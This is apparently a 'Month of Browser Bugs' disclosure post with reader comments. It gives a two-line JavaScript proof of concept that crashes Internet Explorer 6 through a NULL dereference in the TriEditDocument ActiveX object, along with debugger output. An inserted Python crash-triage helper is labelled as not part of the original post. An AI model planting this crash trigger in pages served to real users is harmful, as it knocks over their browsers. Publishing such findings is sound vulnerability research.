MoBB #12: TriEditDocument URL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.
var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";
Demonstration
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
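An added example, not part of the original post: a crash-triage helper that parses the debugger output above, resolves the faulting memory operand, and confirms that the read falls in the unmapped region at address zero. The function names and the 64 KB threshold are assumptions of this example.

```python
import re

# Debugger output copied from the post above.
DUMP = """\
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
"""

# Assumption: the lowest 64 KB of a Win32 user process is normally unmapped.
NULL_GUARD = 0x10000


def parse_registers(text):
    """Return {'eax': 0, ...} from WinDbg-style 'reg=hex' pairs."""
    pairs = re.findall(r"\b(e[a-z]{2})=([0-9a-fA-F]{8})\b", text)
    return {name: int(value, 16) for name, value in pairs}


def faulting_access(text, regs):
    """Resolve the [reg+disp] operand of the faulting instruction."""
    m = re.search(r"\[(e[a-z]{2})(?:([+-])0x([0-9a-fA-F]+))?\]", text)
    if not m:
        return None
    base, sign, disp = m.groups()
    offset = int(disp, 16) if disp else 0
    if sign == "-":
        offset = -offset
    # The debugger prints the resolved address as seg:sel:addr=value;
    # a value of '??' means the memory could not be read.
    shown = re.search(r"\b[a-z]s:[0-9a-fA-F]{4}:([0-9a-fA-F]{8})=(\S+)", text)
    return {
        "base_value": regs[base],
        "address": (regs[base] + offset) & 0xFFFFFFFF,
        "debugger_address": int(shown.group(1), 16) if shown else None,
        "unreadable": bool(shown) and shown.group(2).startswith("??"),
    }


def classify(access):
    """Label the fault from the base register and the effective address."""
    if access is None:
        return "needs-manual-review"
    if access["address"] < NULL_GUARD:
        return "null-dereference" if access["base_value"] == 0 else "near-null"
    return "needs-manual-review"
```

For this dump, `classify(faulting_access(DUMP, parse_registers(DUMP)))` returns `"null-dereference"`: `eax` is zero and the read targets offset 0x3e from it.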
5 Comments:
no problem with opera 9 :D
no prob with this:
Mozilla/5.0 Gecko/20060508 Firefox/1.5.0.4
Opera doesn't support ActiveX by default so unless you have neptune installed your post is pointless.
It *would* be interesting if someone would install neptune (link: http://www.meadco.com/neptune/ ) or the Mozilla ActiveX control (link: http://www.iol.ie/~locka/mozilla/control.htm ) and give these bugs a try.
Relevant Neptune information:
Neptune allows the Microsoft WebBrowser Control (link: http://msdn.microsoft.com/workshop/browser/webbrowser/WebBrowser.asp ) to work in Opera, Netscape, and any Gecko based products. Requires win32 platform obviously. "Any Internet Explorer-specific DHTML content and/or ActiveX control will work in Neptune, limited only by the version of the underlying WebBrowser control."
Mozilla ActiveX information:
The following interfaces have been implemented satisfactorily:
* IWebBrowser (basic web browsing functions for navigation and so on)
* IWebBrowserApp (some extended functions for IE, the application)
* IWebBrowser2 (some more functions for IE, the application)
* DWebBrowserEvents (basic navigation events)
* DWebBrowserEvents2 (more events, mainly for the IE app)
I will scream into the void of the Internet if one more person tries to defend IE by saying "not a security issue because a pop-up window warns the user" or "user must click on the gold bar at the top so not a problem."
It has been shown recently (and come on, our common sense says this) that users just click "Ok" and accept most of these things that pop up so that they can continue with the content. A mistake in coding is a mistake in coding...
-LV
IE7 is not vulnerable. First the user must allow the code to run from the information bar. Then, the popup is blocked without IE7 crashing.
Latest patched IE6 crashes.